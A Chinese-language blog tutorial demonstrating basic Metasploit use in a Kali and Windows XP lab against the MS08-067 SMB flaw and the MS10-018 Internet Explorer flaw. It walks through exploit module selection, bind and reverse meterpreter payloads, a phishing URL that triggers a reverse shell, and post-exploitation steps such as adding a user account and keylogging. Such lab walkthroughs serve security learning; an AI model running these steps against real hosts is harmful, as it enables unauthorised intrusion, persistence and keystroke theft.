MSF的基础使用

以两个windows主机层面的漏洞,简单演示一下msf框架的使用。

MS08-067

简介

影响范围:MS08-067漏洞会影响Windows 2000/XP/Server 2003/Vista/Server 2008的各个版本,甚至还包括测试阶段的Windows 7 Pro-Beta。

漏洞产生的原因及攻击效果:如果用户在受影响的系统上收到特制的 RPC 请求,则可能导致攻击者在未经身份验证的情况下利用此漏洞运行任意代码,实现远程代码执行。现阶段,已经可以通过防火墙来阻断该漏洞的攻击。

漏洞利用

先测试网络连通性

1.输入msfconsole进入msf终端

2.查找利用ms08-067漏洞利用模块

bash 复制代码
search ms08-067
bash 复制代码
use exploit/windows/smb/ms08_067_netapi

3.查看该攻击模块下所需的配置信息

bash 复制代码
show options

4.设置options

设置攻击payload为bind模式

bash 复制代码
set payload windows/meterpreter/bind_tcp

reverse_tcp 反弹shell xp主动连接kali

bind_tcp:主动连接 kali主动攻击xp 不需要xp主机用户做啥操作,啥都不做就会被打

设置靶机地址:

bash 复制代码
set RHOST 192.168.1.6

查看targets

选择攻击目标

bash 复制代码
set target 34

5.检查options配置

6.expliot利用该漏洞 出现meterpreter则代表利用成功 拿到了系统的shell

后渗透

出现meterpreter则代表漏洞利用成功 接下来可以做一些后渗透的动作了

比如查看配置 进入win命令行 添加用户 键盘监听等

1.进入Windows Shell

bash 复制代码
shell

刚刚还是在msf攻击的控制台 现在是在windows的shell命令行

2.添加用户

bash 复制代码
net user didi 123 /add

3.使用 ps 查看进程

4.使用ps找到合适的进程进行迁移,迁移到有管理员权限的进程

比如我迁移到ie浏览器进程

开启键盘记录后 在xp浏览器端不管键盘敲什么都会被记录下来

执行keyscan_dump查看记录的情况

keyscan_stop 关闭键盘记录

MS10-018漏洞

简介

MS10-018是IE浏览器上的漏洞,主要危害Internet Explorer 6~7,攻击者可以通过该漏洞获取受害主机的控制权。

┗|`O′|┛ 嗷~~ 是打浏览器的漏洞,不是打系统的,但是同样可以达到RCE的效果

漏洞利用

实验环境:kali虚拟机 winxp虚拟机

先把防火墙打开 否则不需要受害者主机浏览器访问触发反弹shell就能执行成功

msf杀死某个session的命令

bash 复制代码
sessions -k 1

1.启动msf 搜索ms10_018

bash 复制代码
msfconsole
search ms10_018

2.使用对应的exploit

bash 复制代码
use exploit/windows/browser/ms10_018_ie_behaviors

3.查看需要的配置 并且进行配置

payload采用reverse_tcp反弹shell的方式

所以需要反弹地址SRVHOST

可以设置其他地址 我们还是设置kali机器为反弹地址

此外也可以设置一下 URIPATH 这是钓鱼网站的url 需要受害者主机去访问该url 才能进行反弹shell

bash 复制代码
set SRVHOST 192.168.1.134
set URIPATH test666

查看修改后的配置

4.运行exploit

5.受害者主机访问http://192.168.1.134:8080/test666

6.反弹shell成功

7.进入会话中利用该会话

相关推荐
志栋智能19 小时前
超自动化安全:构建智能安全运营的核心引擎
大数据·运维·服务器·数据库·安全·自动化·产品运营
星幻元宇VR20 小时前
VR航空航天科普设备【VR时空直升机】
科技·学习·安全·生活·vr
weixin_5142531821 小时前
428-uitars tmux
安全·web安全
KKKlucifer1 天前
日志审计与行为分析在安全服务中的应用实践
网络·人工智能·安全
ykjhr_3d1 天前
vr电力安全培训系统有哪些
安全·vr·华锐视点
枷锁—sha1 天前
【CTFshow-pwn系列】03_栈溢出【pwn 073】详解:静态编译下的自动化 ROP 链构建
网络·汇编·笔记·安全·网络安全·自动化
VBsemi-专注于MOSFET研发定制1 天前
面向高可靠与能效需求的安全存储系统功率器件选型策略与适配手册
安全
xixixi777771 天前
AI安全周记:AI驱动攻击占比50%、PQC国标落地、ShinyHunters连环袭击——面对1:25的攻防成本鸿沟,防守方还能撑多久?
人工智能·安全·ai·大模型·aigc·量子计算·供应链
智擎软件测评小祺1 天前
什么是非功能检测?筑牢软件性能与安全的基石
功能测试·安全·检测·cma·第三方检测·cnas·非功能检测
jinanwuhuaguo1 天前
OpenClaw执行奇点——因果链折叠与责任悬置的时间哲学(第十九篇)
前端·人工智能·安全·重构·openclaw